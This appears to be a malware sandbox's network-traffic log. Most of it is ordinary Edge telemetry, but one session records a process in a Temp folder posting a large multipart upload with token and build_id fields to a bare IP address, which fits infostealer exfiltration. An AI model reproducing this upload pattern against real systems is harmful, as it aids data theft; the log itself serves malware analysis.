                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:14 GMT
                                                                                                                                                                                                                                                                                                                          Location: /b2?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                                          set-cookie: UID=1EA27ce3b1ee0d790c63e791736698994; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                                          set-cookie: XID=1EA27ce3b1ee0d790c63e791736698994; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                          Via: 1.1 7737ef6f12229d4564d45a2b0c059e2e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: wHHLu1CEnyXJGmmfdzZT8tEqGpk2EC_5iCAkE3aunlrGrbbfslHneg==


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          31192.168.2.55007820.110.205.1194437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC1175OUTGET /c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                          Location: https://c.bing.com/c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=9C9B0C5E00C44C8A8B186E4587E0FF4B&RedC=c.msn.com&MXFR=0DA5835E35016A581E46962C34736B24
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=0DA5835E35016A581E46962C34736B24; domain=.msn.com; expires=Fri, 06-Feb-2026 16:23:14 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:13 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          32192.168.2.55007513.89.179.134437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698992881&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 3856
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC3856OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 32 54 31 36 3a 32 33 3a 31 32 2e 38 37 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 32 66 32 61 64 65 2d 38 37 38 61 2d 34 66 61 34 2d 39 62 33 31 2d 30 35 39 37 37 38 31 62 66 33 30 37 22 2c 22 65 70 6f 63 68 22 3a 22 37 34 37 34 34 35 36 34 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-12T16:23:12.877Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"locale"
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=23beda1702194926a21626b7a637e383&HASH=23be&LV=202501&V=4&LU=1736698994514; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=89df4dd1b67d4c29b0739dfcc7f9a505; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1633
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:13 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          33192.168.2.55008818.238.49.994437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC1012OUTGET /b2?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: UID=1EA27ce3b1ee0d790c63e791736698994; XID=1EA27ce3b1ee0d790c63e791736698994
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:15 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:15 GMT
                                                                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                          Via: 1.1 932eefec422d884c28f3c110319f29fe.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: 5e0izEHFpXAVKo_m9B-JVofGIMD39UrpPBti2c2M-7wLZPpUmmWnkQ==


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          34192.168.2.55010620.110.205.1194437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC1271OUTGET /c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=9C9B0C5E00C44C8A8B186E4587E0FF4B&MUID=0DA5835E35016A581E46962C34736B24 HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; SM=T; _C_ETH=1
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT
                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                          ETag: "dda11c98eb61db1:0"
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=0DA5835E35016A581E46962C34736B24; domain=.msn.com; expires=Fri, 06-Feb-2026 16:23:16 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: SRM_M=0DA5835E35016A581E46962C34736B24; domain=c.msn.com; expires=Fri, 06-Feb-2026 16:23:16 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MR=0; domain=c.msn.com; expires=Sun, 19-Jan-2025 16:23:16 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Sun, 12-Jan-2025 16:33:16 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:15 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          35192.168.2.550105195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC185OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----A1VKFU3EKF3E37900ZM7
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 393697
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------A1VKFU3EKF3E37900ZM7Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------A1VKFU3EKF3E37900ZM7Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------A1VKFU3EKF3E37900ZM7Cont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
